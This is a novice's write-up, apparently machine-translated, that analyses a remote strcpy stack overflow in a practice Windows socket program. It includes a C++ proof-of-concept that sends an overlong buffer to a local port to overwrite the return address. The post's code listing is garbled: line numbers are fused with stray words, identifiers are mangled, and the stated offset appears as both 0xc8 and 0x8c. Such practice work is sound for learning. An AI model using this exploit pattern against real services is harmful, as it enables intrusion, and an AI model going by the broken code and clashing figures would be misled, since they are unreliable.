A simple analysis of remote Overflow vulnerability

The first flaw in life analysis, good excitement.

Because has never been exposed to the analysis of loopholes, before also just read a little book, so always want to find something to practice practiced hand, the results turned to see the snow exploit me topic, originally thought it would be difficult, the results are very basic, suitable for me such a novice practiced hand.

http://bbs.pediy.com/showthread.php?t=56998

Go to the Chase

First I got a Windows program and dragged it to IDA to look at it and found that the program logic was surprisingly simple. is a very regular socket process with some error handling.

Detailed instructions below.

MOV ebp,eax

Test EBP,EBP

It's obvious that the socket function is incorrectly handled

Also error handling to determine if the Accept function is performing successfully

Here's the point, because the connection is over, and the problem is definitely here.

Follow up on this call

Found that there is a copy of the behavior, F5 look, it turns out to be a strcpy

Also find a fun place, this function does not create a stack frame, this function is really call came in not in JMP.

However, there is no stack frame. is through the ESP operation to open up the stack space and specify the return address.

So here we can guess 0xc8 is the size of the local variable distance return address.

Next, use OD for debugging.

In the RET up and down breakpoints, you can get this.

The analysis stack shows that it is really the size of the 0x8c that we guessed.

Wrote a simple socket to send Shellcode

1 //EXP.cpp: Defines the entry point of the console application. 2 //3 4#include <winsock2.h>5#include"stdafx.h"6#include"windows.h"7 #pragmaComment (lib, "Ws2_32.lib")8 CharShellcode[] =9 "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"Ten "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" One "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" A "Aaaaaaaaaaaaaaaaaaaaaa\xcc\xdd\xee\xff"; - intMain () - { the SOCKET mysocket; - wsadata Outdata; -WSAStartup (Makeword (2,2), &outdata); -Mysocket =sockets (Af_inet, Sock_stream, ipproto_tcp); + sockaddr_in Socketinfo; -socketinfo.sin_family =af_inet; +Socketinfo.sin_addr. S_un. S_ADDR = inet_addr ("127.0.0.1"); ASocketinfo.sin_port = htons (7777);//7777 port through the function analysis of the bind of the target, we can obtain at     if(Connect (Mysocket, (SOCKADDR *) &socketinfo,sizeof(socketinfo)) -==socket_error) -     { -MessageBox (NULL, L"Error", L"Error",0); -     } -Send (Mysocket, Shellcode,sizeof(Shellcode),0); in     return 0; -}

The results are as follows

The return address was successfully overwritten!

I should have written shellcode, but because I can't write. So, I'll make it up later, and I'll study it again.

The vulnerability has been analyzed here, is a simple strcpy caused by a remote overflow vulnerability.

A simple analysis of remote Overflow vulnerability